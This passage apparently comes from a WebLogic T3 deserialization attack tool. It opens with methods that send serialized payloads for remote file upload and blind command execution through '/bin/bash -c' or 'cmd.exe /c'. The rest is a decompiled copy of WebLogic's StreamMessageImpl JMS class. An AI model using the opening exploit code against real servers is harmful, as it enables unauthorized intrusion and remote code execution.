        T3ProtocolOperation.send(host, port, SerialDataGenerator.serialRmiDatas(bootArgs));
    }

    /** Sends the serialUploadDatas object built from {@code filePath} and {@code content}. */
    public static void uploadFile(String host, String port, String filePath, byte[] content) throws Exception {
        T3ProtocolOperation.send(host, port, SerialDataGenerator.serialUploadDatas(filePath, content));
    }

    /**
     * Sends the serialBlindDatas object for {@code cmd}. Without the "os" option the
     * argument vector is {@code cmd} alone; with "os" equal to "linux" (case-insensitive)
     * it is prefixed with "/bin/bash", "-c"; with any other "os" value it is prefixed
     * with "cmd.exe", "/c".
     */
    public static void blindExecute(String host, String port, String cmd) throws Exception {
        final String[] argv;
        if (!Main.cmdLine.hasOption("os")) {
            argv = new String[]{cmd};
        } else if (Main.cmdLine.getOptionValue("os").equalsIgnoreCase("linux")) {
            argv = new String[]{"/bin/bash", "-c", cmd};
        } else {
            argv = new String[]{"cmd.exe", "/c", cmd};
        }
        T3ProtocolOperation.send(host, port, SerialDataGenerator.serialBlindDatas(argv));
    }
}
================================================
FILE: src/weblogic/jms/common/StreamMessageImpl.java
================================================
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package weblogic.jms.common;
import weblogic.jms.JMSClientExceptionLogger;
import javax.jms.Destination;
import javax.jms.JMSException;
import javax.jms.MessageEOFException;
import javax.jms.MessageNotWriteableException;
import javax.jms.*;
import java.io.*;
public final class StreamMessageImpl extends MessageImpl implements StreamMessage, Externalizable {
static final long serialVersionUID = 7748687583664395357L;
private static final byte EXTVERSION1 = 1;
private static final byte EXTVERSION2 = 2;
private static final byte EXTVERSION3 = 3;
private static final byte VERSIONMASK = 127;
private static final byte UNKNOWN_TYPECODE = 0;
private static final byte BOOLEAN_TYPE = 1;
private static final byte BYTE_TYPE = 2;
private static final byte CHAR_TYPE = 3;
private static final byte DOUBLE_TYPE = 4;
private static final byte FLOAT_TYPE = 5;
private static final byte INT_TYPE = 6;
private static final byte LONG_TYPE = 7;
private static final byte SHORT_TYPE = 8;
private static final byte STRING_UTF_TYPE = 9;
private static final byte STRING_UTF32_TYPE = 10;
private static final byte BYTES_TYPE = 11;
private static final byte NULL_TYPE = 12;
private static final String[] TYPE_CODE_STRINGS = new String[]{"invalid type code", "boolean", "byte", "char", "double", "float", "integer", "long", "short", "String", "String", "byte array", "null object"};
private static final String ERROR_MSG_SEGMENT = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
private boolean readingByteArray;
private int available_bytes;
private transient byte[] buffer;
private transient int length;
private transient boolean copyOnWrite;
private transient BufferDataOutputStream bdos;
private transient BufferDataInputStream bdis;
/** Creates an empty message; the public no-arg constructor is required by Externalizable. */
public StreamMessageImpl() {
}
/**
 * Copy constructor: delegates to the three-argument constructor with both
 * Destination arguments null.
 */
public StreamMessageImpl(StreamMessage var1) throws IOException, JMSException {
    this(var1, (Destination) null, (Destination) null);
}
/**
 * Copies {@code var1} into this message: the superclass constructor receives the three
 * arguments, then every object readable from {@code var1} is written into this body.
 * A foreign (non-StreamMessageImpl) source is reset first.
 */
public StreamMessageImpl(StreamMessage var1, Destination var2, Destination var3) throws IOException, JMSException {
    super(var1, var2, var3);
    if (!(var1 instanceof StreamMessageImpl)) {
        var1.reset();
    }
    try {
        // The loop has no exit condition; it ends when readObject() signals end of
        // stream by throwing MessageEOFException.
        while (true) {
            this.writeObject(var1.readObject());
        }
    } catch (MessageEOFException var5) {
        this.reset();
        this.setPropertiesWritable(false);
    }
}
/**
 * @return the constant 5
 *         (NOTE(review): presumably the message-type code for stream messages — confirm)
 */
public byte getType() {
    return 5;
}
/** Drops the message body: clears the buffer, both stream wrappers and the read state. */
public void nullBody() {
    // backing storage
    this.buffer = null;
    this.length = 0;
    this.copyOnWrite = false;
    // stream views over the buffer
    this.bdos = null;
    this.bdis = null;
    // partial byte-array read bookkeeping
    this.available_bytes = 0;
    this.readingByteArray = false;
}
/**
 * Pushes the last consumed byte back onto the input stream via unput(), unless a
 * byte-array read is in progress.
 */
private void putTypeBack() {
    if (this.readingByteArray) {
        return;
    }
    this.bdis.unput();
}
/** @return the message text of JMSClientExceptionLogger.logReadPastEndLoggable() */
private String readPastEnd() {
    return JMSClientExceptionLogger.logReadPastEndLoggable().getMessage();
}
/** @return the message text of JMSClientExceptionLogger.logStreamReadErrorLoggable() */
private String streamReadError() {
    return JMSClientExceptionLogger.logStreamReadErrorLoggable().getMessage();
}
/** @return the message text of JMSClientExceptionLogger.logStreamWriteErrorLoggable() */
private String streamWriteError() {
    return JMSClientExceptionLogger.logStreamWriteErrorLoggable().getMessage();
}
/**
 * @param var1 first argument passed to logConversionErrorLoggable (callers pass the found type name)
 * @param var2 second argument passed to logConversionErrorLoggable (callers pass the requested type name)
 * @return the message text of JMSClientExceptionLogger.logConversionErrorLoggable(var1, var2)
 */
private String streamConversionError(String var1, String var2) {
    return JMSClientExceptionLogger.logConversionErrorLoggable(var1, var2).getMessage();
}
/**
 * Returns the type code of the next field. The body is decompressed and checked for
 * readability first. While a byte-array read is in progress no byte is consumed and
 * 11 is returned; otherwise one byte is read from the input stream.
 *
 * @throws JMSException a MessageEOFException at end of body, or a JMSException wrapping
 *                      any other IOException
 */
private byte readType() throws JMSException {
    this.decompressMessageBody();
    this.checkReadable();
    if (this.readingByteArray) {
        return 11;
    }
    try {
        return this.bdis.readByte();
    } catch (EOFException endOfBody) {
        throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), endOfBody);
    } catch (IOException ioFailure) {
        throw new weblogic.jms.common.JMSException(this.streamReadError(), ioFailure);
    }
}
/**
 * Writes one type-code byte to the output stream after checking the message is writable.
 *
 * @param var1 type code to write
 * @throws JMSException wrapping any IOException from the underlying stream
 */
private void writeType(byte var1) throws JMSException {
    this.checkWritable();
    try {
        this.bdos.writeByte(var1);
    } catch (IOException ioFailure) {
        final String message = JMSClientExceptionLogger.logStreamWriteErrorLoggable().getMessage();
        throw new weblogic.jms.common.JMSException(message, ioFailure);
    }
}
/**
 * Reads the next field as a boolean. Accepts a stored boolean (type 1) or a string
 * (types 9 and 10) parsed as a boolean; any other type is pushed back and reported as a
 * MessageFormatException.
 */
public boolean readBoolean() throws JMSException {
    final byte typeCode = this.readType();
    try {
        if (typeCode == 1) {
            return this.bdis.readBoolean();
        }
        if (typeCode == 9 || typeCode == 10) {
            return Boolean.parseBoolean(this.readStringInternal(typeCode));
        }
        // Not convertible: restore the type byte so the field can be read another way.
        this.putTypeBack();
        final String suffix = this.readingByteArray
                ? ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage"
                : "";
        throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(typeCode), this.typeCodeToString(1)) + suffix);
    } catch (EOFException endOfBody) {
        throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), endOfBody);
    } catch (IOException ioFailure) {
        throw new weblogic.jms.common.JMSException(this.streamReadError(), ioFailure);
    }
}
/**
 * Reads the next field as a byte. Accepts a stored byte (type 2) or a string (types 9
 * and 10) parsed with Byte.parseByte; any other type is pushed back and reported as a
 * MessageFormatException. If parsing fails the stream is rewound to the field start
 * and the NumberFormatException is rethrown.
 */
public byte readByte() throws JMSException {
    final byte typeCode = this.readType();
    try {
        switch (typeCode) {
            case 2:
                return this.bdis.readByte();
            case 9:
            case 10:
                // remember the position so a failed parse can be undone
                this.bdis.mark();
                return Byte.parseByte(this.readStringInternal(typeCode));
            default:
                this.putTypeBack();
                final String suffix = this.readingByteArray
                        ? ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage"
                        : "";
                throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(typeCode), this.typeCodeToString(2)) + suffix);
        }
    } catch (EOFException endOfBody) {
        throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), endOfBody);
    } catch (IOException ioFailure) {
        throw new weblogic.jms.common.JMSException(this.streamReadError(), ioFailure);
    } catch (NumberFormatException badNumber) {
        this.bdis.backToMark();
        this.bdis.unput();
        throw badNumber;
    }
}
/**
 * Reads the next field as a short. Accepts a stored byte (type 2, widened), a stored
 * short (type 8) or a string (types 9 and 10) parsed with Short.parseShort; any other
 * type is pushed back and reported as a MessageFormatException. If parsing fails the
 * stream is rewound to the field start and the NumberFormatException is rethrown.
 */
public short readShort() throws JMSException {
    final byte typeCode = this.readType();
    try {
        switch (typeCode) {
            case 2:
                return (short) this.bdis.readByte();
            case 8:
                return this.bdis.readShort();
            case 9:
            case 10:
                // remember the position so a failed parse can be undone
                this.bdis.mark();
                return Short.parseShort(this.readStringInternal(typeCode));
            default:
                this.putTypeBack();
                final String suffix = this.readingByteArray
                        ? ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage"
                        : "";
                throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(typeCode), this.typeCodeToString(8)) + suffix);
        }
    } catch (EOFException endOfBody) {
        throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), endOfBody);
    } catch (IOException ioFailure) {
        throw new weblogic.jms.common.JMSException(this.streamReadError(), ioFailure);
    } catch (NumberFormatException badNumber) {
        this.bdis.backToMark();
        this.bdis.unput();
        throw badNumber;
    }
}
/**
 * Reads the next field as a char. Accepts only a stored char (type 3). A stored null
 * (type 12) is pushed back and reported as NullPointerException; any other type is
 * pushed back and reported as a MessageFormatException.
 */
public char readChar() throws JMSException {
    final byte typeCode = this.readType();
    try {
        if (typeCode == 3) {
            return this.bdis.readChar();
        }
        // Every remaining type is an error; restore the type byte first.
        this.putTypeBack();
        if (typeCode == 12) {
            throw new NullPointerException();
        }
        final String suffix = this.readingByteArray
                ? ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage"
                : "";
        throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(typeCode), this.typeCodeToString(3)) + suffix);
    } catch (EOFException endOfBody) {
        throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), endOfBody);
    } catch (IOException ioFailure) {
        throw new weblogic.jms.common.JMSException(this.streamReadError(), ioFailure);
    }
}
/**
 * Reads the next field as an int. Accepts a stored byte (type 2), int (type 6) or short
 * (type 8), each widened, or a string (types 9 and 10) parsed with Integer.parseInt;
 * any other type is pushed back and reported as a MessageFormatException. If parsing
 * fails the stream is rewound to the field start and the NumberFormatException is
 * rethrown.
 */
public int readInt() throws JMSException {
    final byte typeCode = this.readType();
    try {
        switch (typeCode) {
            case 2:
                return this.bdis.readByte();
            case 6:
                return this.bdis.readInt();
            case 8:
                return this.bdis.readShort();
            case 9:
            case 10:
                // remember the position so a failed parse can be undone
                this.bdis.mark();
                return Integer.parseInt(this.readStringInternal(typeCode));
            default:
                this.putTypeBack();
                final String suffix = this.readingByteArray
                        ? ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage"
                        : "";
                throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(typeCode), this.typeCodeToString(6)) + suffix);
        }
    } catch (EOFException endOfBody) {
        throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), endOfBody);
    } catch (IOException ioFailure) {
        throw new weblogic.jms.common.JMSException(this.streamReadError(), ioFailure);
    } catch (NumberFormatException badNumber) {
        this.bdis.backToMark();
        this.bdis.unput();
        throw badNumber;
    }
}
/**
 * Reads the next field as a long. Accepts a stored byte (type 2), int (type 6), long
 * (type 7) or short (type 8), each widened, or a string (types 9 and 10) parsed with
 * Long.parseLong; any other type is pushed back and reported as a
 * MessageFormatException. If parsing fails the stream is rewound to the field start
 * and the NumberFormatException is rethrown.
 */
public long readLong() throws JMSException {
    final byte typeCode = this.readType();
    try {
        switch (typeCode) {
            case 2:
                return (long) this.bdis.readByte();
            case 6:
                return (long) this.bdis.readInt();
            case 7:
                return this.bdis.readLong();
            case 8:
                return (long) this.bdis.readShort();
            case 9:
            case 10:
                // remember the position so a failed parse can be undone
                this.bdis.mark();
                return Long.parseLong(this.readStringInternal(typeCode));
            default:
                this.putTypeBack();
                final String suffix = this.readingByteArray
                        ? ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage"
                        : "";
                throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(typeCode), this.typeCodeToString(7)) + suffix);
        }
    } catch (EOFException endOfBody) {
        throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), endOfBody);
    } catch (IOException ioFailure) {
        throw new weblogic.jms.common.JMSException(this.streamReadError(), ioFailure);
    } catch (NumberFormatException badNumber) {
        this.bdis.backToMark();
        this.bdis.unput();
        throw badNumber;
    }
}
/**
 * Reads the next field as a float. Accepts a stored float (type 5) or a string (types 9
 * and 10) parsed with Float.parseFloat; any other type is pushed back and reported as
 * a MessageFormatException. If parsing fails the stream is rewound to the field start
 * and the NumberFormatException is rethrown.
 */
public float readFloat() throws JMSException {
    final byte typeCode = this.readType();
    try {
        switch (typeCode) {
            case 5:
                return this.bdis.readFloat();
            case 9:
            case 10:
                // remember the position so a failed parse can be undone
                this.bdis.mark();
                return Float.parseFloat(this.readStringInternal(typeCode));
            default:
                this.putTypeBack();
                final String suffix = this.readingByteArray
                        ? ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage"
                        : "";
                throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(typeCode), this.typeCodeToString(5)) + suffix);
        }
    } catch (EOFException endOfBody) {
        throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), endOfBody);
    } catch (IOException ioFailure) {
        throw new weblogic.jms.common.JMSException(this.streamReadError(), ioFailure);
    } catch (NumberFormatException badNumber) {
        this.bdis.backToMark();
        this.bdis.unput();
        throw badNumber;
    }
}
/**
 * Reads the next stream element and returns it as a {@code double}.
 *
 * <p>Type code 4 is read directly as a double and type code 5 is read as a
 * float and widened. Type codes 9 and 10 are read as a string and parsed with
 * {@link Double#parseDouble(String)}. Every other type code (including 6, 7
 * and 8) is pushed back and reported as a conversion error.
 *
 * @return the element converted to {@code double}
 * @throws JMSException if the element type cannot be converted, the stream
 *         ends early, or the underlying read fails
 * @throws NumberFormatException if a string element is not a valid double;
 *         the stream is rewound to the mark and the type byte is un-read first
 */
public double readDouble() throws JMSException {
    final byte typeCode = this.readType();
    try {
        if (typeCode == 4) {
            return this.bdis.readDouble();
        }
        if (typeCode == 5) {
            return (double) this.bdis.readFloat();
        }
        if (typeCode == 9 || typeCode == 10) {
            // Mark the position so the NumberFormatException handler can rewind.
            this.bdis.mark();
            return Double.parseDouble(this.readStringInternal(typeCode));
        }
        this.putTypeBack();
        String pendingBytesHint = "";
        if (this.readingByteArray) {
            pendingBytesHint = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
        }
        throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(typeCode), this.typeCodeToString(4)) + pendingBytesHint);
    } catch (EOFException endOfStream) {
        throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), endOfStream);
    } catch (IOException readFailure) {
        throw new weblogic.jms.common.JMSException(this.streamReadError(), readFailure);
    } catch (NumberFormatException badNumber) {
        this.bdis.backToMark();
        this.bdis.unput();
        throw badNumber;
    }
}
/**
 * Reads the next stream element and returns its string form.
 *
 * <p>Elements tagged 1 to 8 are read with the matching primitive reader and
 * converted with {@code String.valueOf}. Elements tagged 9 or 10 are read as
 * strings, and tag 12 yields {@code null}. Any other tag (including 11) is
 * pushed back and reported as a conversion error.
 *
 * @return the element as a string, or {@code null} for a type-12 element
 * @throws JMSException if the element type cannot be converted, the stream
 *         ends early, or the underlying read fails
 */
public String readString() throws JMSException {
    final byte typeCode = this.readType();
    try {
        switch (typeCode) {
            case 9:
            case 10:
                return this.readStringInternal(typeCode);
            case 12:
                return null;
            case 1:
                return String.valueOf(this.bdis.readBoolean());
            case 2:
                return String.valueOf(this.bdis.readByte());
            case 3:
                return String.valueOf(this.bdis.readChar());
            case 4:
                return String.valueOf(this.bdis.readDouble());
            case 5:
                return String.valueOf(this.bdis.readFloat());
            case 6:
                return String.valueOf(this.bdis.readInt());
            case 7:
                return String.valueOf(this.bdis.readLong());
            case 8:
                return String.valueOf(this.bdis.readShort());
            default:
                break;
        }
        // Unsupported tag: un-read it and report the conversion failure.
        this.putTypeBack();
        String pendingBytesHint = "";
        if (this.readingByteArray) {
            pendingBytesHint = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
        }
        throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(typeCode), this.typeCodeToString(9)) + pendingBytesHint);
    } catch (EOFException endOfStream) {
        throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), endOfStream);
    } catch (IOException readFailure) {
        throw new weblogic.jms.common.JMSException(this.streamReadError(), readFailure);
    }
}
/**
 * Reads the next chunk of a byte-array element (type code 11) into var1.
 *
 * The first call for an element reads the type byte and a 4-byte length into
 * available_bytes; later calls continue the same element while
 * readingByteArray is set.
 *
 * @param var1 destination buffer; must not be null
 * @return the value returned by the underlying read, 0 for an empty array
 *         element, or -1 for a type-12 element or when no bytes remain
 * @throws NullPointerException if var1 is null
 * @throws JMSException if the element is not a byte array, the stream ends
 *         early, or the underlying read fails
 */
public int readBytes(byte[] var1) throws JMSException {
// Unused local; presumably decompiler residue.
boolean var3 = true;
if (var1 == null) {
throw new NullPointerException();
} else {
try {
if (!this.readingByteArray) {
byte var2;
if ((var2 = this.readType()) != 11) {
if (var2 == 12) {
return -1;
}
this.bdis.unput();
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var2), this.typeCodeToString(11)));
}
// NOTE(review): the length prefix comes straight from the stream and is not
// checked for a negative value before it is used as a read length below.
this.available_bytes = this.bdis.readInt();
if (this.available_bytes == 0) {
return 0;
}
this.readingByteArray = true;
}
if (this.available_bytes == 0) {
this.readingByteArray = false;
return -1;
} else {
int var9;
if (var1.length > this.available_bytes) {
// Destination is larger than what remains: read the rest and finish the element.
var9 = this.bdis.read(var1, 0, this.available_bytes);
this.readingByteArray = false;
} else {
var9 = this.bdis.read(var1, 0, var1.length);
// NOTE(review): the counter is reduced by var1.length, not by the number of
// bytes actually read (var9) - confirm read() always fills the buffer here.
this.available_bytes -= var1.length;
}
return var9;
}
} catch (EOFException var5) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var5);
} catch (IOException var6) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var6);
} catch (ArrayIndexOutOfBoundsException var7) {
throw new weblogic.jms.common.JMSException(JMSClientExceptionLogger.logStreamReadErrorIndexLoggable().getMessage(), var7);
} catch (ArrayStoreException var8) {
throw new weblogic.jms.common.JMSException(JMSClientExceptionLogger.logStreamReadErrorStoreLoggable().getMessage(), var8);
}
}
}
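/**
 * Reads the next stream element and returns it as an object.
 *
 * <p>Type codes 1 to 8 yield the boxed primitive, 9 and 10 yield a
 * {@code String}, 11 yields a freshly allocated {@code byte[]} and 12 yields
 * {@code null}. Any other type code is un-read and reported as a conversion
 * error.
 *
 * <p>Changes from the decompiled original: boxed values are obtained through
 * {@code valueOf} instead of the deprecated wrapper constructors, and a
 * negative byte-array length prefix is reported as a stream read error
 * instead of escaping as an unchecked {@code NegativeArraySizeException}.
 *
 * @return the decoded element, or {@code null} for a type-12 element
 * @throws JMSException if the element type is unknown, a byte-array read is
 *         still in progress, the stream ends early, or the underlying read fails
 */
public Object readObject() throws JMSException {
    final byte typeCode = this.readType();
    try {
        switch (typeCode) {
            case 1:
                return Boolean.valueOf(this.bdis.readBoolean());
            case 2:
                return Byte.valueOf(this.bdis.readByte());
            case 3:
                return Character.valueOf(this.bdis.readChar());
            case 4:
                return Double.valueOf(this.bdis.readDouble());
            case 5:
                return Float.valueOf(this.bdis.readFloat());
            case 6:
                return Integer.valueOf(this.bdis.readInt());
            case 7:
                return Long.valueOf(this.bdis.readLong());
            case 8:
                return Short.valueOf(this.bdis.readShort());
            case 9:
            case 10:
                return this.readStringInternal(typeCode);
            case 11:
                if (this.readingByteArray) {
                    throw new MessageFormatException("Can not read next data. Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage");
                }
                final int declaredLength = this.bdis.readInt();
                if (declaredLength < 0) {
                    // The length prefix is read from the message body; a negative value
                    // means the body is corrupt. Routed through the IOException handler
                    // below so callers see a JMSException.
                    throw new IOException("Negative byte array length in stream message: " + declaredLength);
                }
                // NOTE(review): the array is sized from the prefix before any data is
                // read, so a large prefix causes a large allocation - consider checking
                // it against the bytes remaining in the buffer if that is available.
                final byte[] bytes = new byte[declaredLength];
                final int bytesRead = this.bdis.read(bytes, 0, declaredLength);
                if (bytesRead != declaredLength) {
                    throw new EOFException("");
                }
                return bytes;
            case 12:
                return null;
            default:
                this.bdis.unput();
                throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(typeCode), "Object"));
        }
    } catch (EOFException endOfStream) {
        throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), endOfStream);
    } catch (IOException readFailure) {
        throw new weblogic.jms.common.JMSException(this.streamReadError(), readFailure);
    }
}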
/**
 * Appends a boolean element: type code 1 followed by the value.
 *
 * @param var1 value to write
 * @throws JMSException if the underlying stream write fails
 */
public void writeBoolean(boolean var1) throws JMSException {
    final byte typeCode = 1;
    this.writeType(typeCode);
    try {
        this.bdos.writeBoolean(var1);
    } catch (IOException writeFailure) {
        throw new weblogic.jms.common.JMSException(this.streamWriteError(), writeFailure);
    }
}
/**
 * Appends a byte element: type code 2 followed by the value.
 *
 * @param var1 value to write
 * @throws JMSException if the underlying stream write fails
 */
public void writeByte(byte var1) throws JMSException {
    final byte typeCode = 2;
    this.writeType(typeCode);
    try {
        this.bdos.writeByte(var1);
    } catch (IOException writeFailure) {
        throw new weblogic.jms.common.JMSException(this.streamWriteError(), writeFailure);
    }
}
/**
 * Appends a short element: type code 8 followed by the value.
 *
 * @param var1 value to write
 * @throws JMSException if the underlying stream write fails
 */
public void writeShort(short var1) throws JMSException {
    final byte typeCode = 8;
    this.writeType(typeCode);
    try {
        this.bdos.writeShort(var1);
    } catch (IOException writeFailure) {
        throw new weblogic.jms.common.JMSException(this.streamWriteError(), writeFailure);
    }
}
/**
 * Appends a char element: type code 3 followed by the value.
 *
 * @param var1 value to write
 * @throws JMSException if the underlying stream write fails
 */
public void writeChar(char var1) throws JMSException {
    final byte typeCode = 3;
    this.writeType(typeCode);
    try {
        this.bdos.writeChar(var1);
    } catch (IOException writeFailure) {
        throw new weblogic.jms.common.JMSException(this.streamWriteError(), writeFailure);
    }
}
/**
 * Appends an int element: type code 6 followed by the value.
 *
 * @param var1 value to write
 * @throws JMSException if the underlying stream write fails
 */
public void writeInt(int var1) throws JMSException {
    final byte typeCode = 6;
    this.writeType(typeCode);
    try {
        this.bdos.writeInt(var1);
    } catch (IOException writeFailure) {
        throw new weblogic.jms.common.JMSException(this.streamWriteError(), writeFailure);
    }
}
/**
 * Appends a long element: type code 7 followed by the value.
 *
 * @param var1 value to write
 * @throws JMSException if the underlying stream write fails
 */
public void writeLong(long var1) throws JMSException {
    final byte typeCode = 7;
    this.writeType(typeCode);
    try {
        this.bdos.writeLong(var1);
    } catch (IOException writeFailure) {
        throw new weblogic.jms.common.JMSException(this.streamWriteError(), writeFailure);
    }
}
/**
 * Appends a float element: type code 5 followed by the value.
 *
 * @param var1 value to write
 * @throws JMSException if the underlying stream write fails
 */
public void writeFloat(float var1) throws JMSException {
    final byte typeCode = 5;
    this.writeType(typeCode);
    try {
        this.bdos.writeFloat(var1);
    } catch (IOException writeFailure) {
        throw new weblogic.jms.common.JMSException(this.streamWriteError(), writeFailure);
    }
}
/**
 * Appends a double element: type code 4 followed by the value.
 *
 * @param var1 value to write
 * @throws JMSException if the underlying stream write fails
 */
public void writeDouble(double var1) throws JMSException {
    final byte typeCode = 4;
    this.writeType(typeCode);
    try {
        this.bdos.writeDouble(var1);
    } catch (IOException writeFailure) {
        throw new weblogic.jms.common.JMSException(this.streamWriteError(), writeFailure);
    }
}
/**
 * Appends a string element, or the type-12 marker when the value is null.
 *
 * @param var1 string to write; {@code null} is written as type code 12 with
 *        no payload
 * @throws JMSException if the underlying stream write fails
 */
public void writeString(String var1) throws JMSException {
    if (var1 == null) {
        final byte nullTypeCode = 12;
        this.writeType(nullTypeCode);
        return;
    }
    try {
        this.writeStringInternal(var1);
    } catch (IOException writeFailure) {
        throw new weblogic.jms.common.JMSException(this.streamWriteError(), writeFailure);
    }
}
/**
 * Appends the whole array as a byte-array element by delegating to the
 * three-argument overload with offset 0.
 *
 * @param var1 bytes to write; a null array fails with
 *        {@code NullPointerException} when its length is read
 * @throws JMSException if the underlying stream write fails
 */
public void writeBytes(byte[] var1) throws JMSException {
    final int wholeLength = var1.length;
    this.writeBytes(var1, 0, wholeLength);
}
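/**
 * Appends a slice of an array as a byte-array element: type code 11, a
 * 4-byte length, then the bytes.
 *
 * <p>The offset and length are validated before anything is written. The
 * decompiled original emitted the type code and the length prefix first, so
 * an out-of-range slice left a partial element in the message body and a
 * negative length was written as the prefix.
 *
 * @param var1 source array; must not be null
 * @param var2 offset of the first byte to write
 * @param var3 number of bytes to write
 * @throws NullPointerException if var1 is null
 * @throws ArrayIndexOutOfBoundsException if the slice does not lie within var1
 * @throws JMSException if the underlying stream write fails
 */
public void writeBytes(byte[] var1, int var2, int var3) throws JMSException {
    if (var1 == null) {
        throw new NullPointerException();
    }
    // Written as "var3 > var1.length - var2" so the comparison cannot overflow.
    if (var2 < 0 || var3 < 0 || var3 > var1.length - var2) {
        throw new ArrayIndexOutOfBoundsException("offset=" + var2 + ", length=" + var3 + ", array length=" + var1.length);
    }
    this.writeType((byte) 11);
    try {
        this.bdos.writeInt(var3);
        this.bdos.write(var1, var2, var3);
    } catch (IOException writeFailure) {
        throw new weblogic.jms.common.JMSException(this.streamWriteError(), writeFailure);
    }
}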
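/**
 * Appends an object by dispatching to the typed writer that matches its
 * runtime class.
 *
 * <p>Accepted types are {@code Boolean}, {@code Byte}, {@code Double},
 * {@code Float}, {@code Integer}, {@code Long}, {@code Short},
 * {@code Character}, {@code String} and {@code byte[]}; {@code null} is
 * written as type code 12.
 *
 * <p>Change from the decompiled original: a {@code Number} that is none of
 * the six supported wrappers (for example {@code BigDecimal}) was silently
 * dropped because the nested chain had no final {@code else}. It is now
 * rejected with the same "Invalid Type" error as every other unsupported
 * class.
 *
 * @param var1 value to write, or {@code null}
 * @throws JMSException if the type is not supported or the write fails
 */
public void writeObject(Object var1) throws JMSException {
    if (var1 == null) {
        this.writeType((byte) 12);
        return;
    }
    if (var1 instanceof Boolean) {
        this.writeBoolean(((Boolean) var1).booleanValue());
    } else if (var1 instanceof Byte) {
        this.writeByte(((Byte) var1).byteValue());
    } else if (var1 instanceof Double) {
        this.writeDouble(((Double) var1).doubleValue());
    } else if (var1 instanceof Float) {
        this.writeFloat(((Float) var1).floatValue());
    } else if (var1 instanceof Integer) {
        this.writeInt(((Integer) var1).intValue());
    } else if (var1 instanceof Long) {
        this.writeLong(((Long) var1).longValue());
    } else if (var1 instanceof Short) {
        this.writeShort(((Short) var1).shortValue());
    } else if (var1 instanceof Character) {
        this.writeChar(((Character) var1).charValue());
    } else if (var1 instanceof String) {
        this.writeString((String) var1);
    } else if (var1 instanceof byte[]) {
        this.writeBytes((byte[]) var1);
    } else {
        throw new MessageFormatException("Invalid Type: " + var1.getClass().getName());
    }
}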
/**
 * Makes the body read-only and repositions it for reading.
 *
 * <p>If an input stream already exists it is reset. Otherwise, if an output
 * stream exists, its buffer and size become the message body and the output
 * stream is discarded. The copy-on-write flag is cleared in every case.
 *
 * @throws JMSException declared by the interface; see the called methods
 */
public void reset() throws JMSException {
    this.setBodyWritable(false);
    final boolean hasReader = this.bdis != null;
    if (hasReader) {
        this.bdis.reset();
    }
    if (!hasReader && this.bdos != null) {
        // Adopt whatever was written so far as the readable body.
        this.buffer = this.bdos.getBuffer();
        this.length = this.bdos.size();
        this.bdos = null;
    }
    this.copyOnWrite = false;
}
/**
 * Creates a read-only copy of this message.
 *
 * <p>The copy receives the same byte array as this message rather than a
 * duplicate. When the body is still held by the output stream, this message
 * sets its copy-on-write flag, which {@code checkWritable} consults before
 * the next write.
 *
 * @return a new {@code StreamMessageImpl} whose body and properties are
 *         marked non-writable
 * @throws JMSException if copying the parent state fails
